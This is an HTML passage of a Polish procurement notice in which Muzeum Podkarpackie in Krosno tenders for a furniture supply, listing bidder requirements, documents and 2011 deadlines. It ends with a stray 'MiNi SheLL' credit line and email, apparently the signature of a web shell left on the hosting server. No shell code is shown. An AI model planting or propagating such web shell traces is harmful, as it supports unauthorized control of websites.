<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.20.00-0, 39.11.31.00-8, 39.12.10.00-6, 39.13.00.00-2, 39.13.60.00-4, 39.14.10.00-2, 39.14.12.00-4, 39.14.31.10-0, 39.15.00.00-8, 39.15.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że w ciągu ostatnich  3 lat (przed dniem wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej jedną  dostawę odpowiadającą swoim rodzajem i wartością (nie mniejszą niż 250.000  zł brutto) dostawie  stanowiącej przedmiot zamówienia i dostawa ta została wykonana należycie ,
wykonawca wykaże należyte wykonanie dostawy przedstawiając stosowny dokument wystawiony na tę dostawę przez Zamawiającego (referencje, zaświadczenie lub inne równoważne, z których wynikać będzie, że zamówienie zostało wykonane należycie) .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik Nr 8 - potwierdzenie odbycia wizji lokalnej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.krosno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Podkarpackie w Krośnie
ul. Piłsudskiego 16
38 - 400 Krosno
(sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2011 godzina 09:30, miejsce: Muzeum Podkarpackie w Krośnie
ul. Piłsudskiego 16
38 - 400 Krosno
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com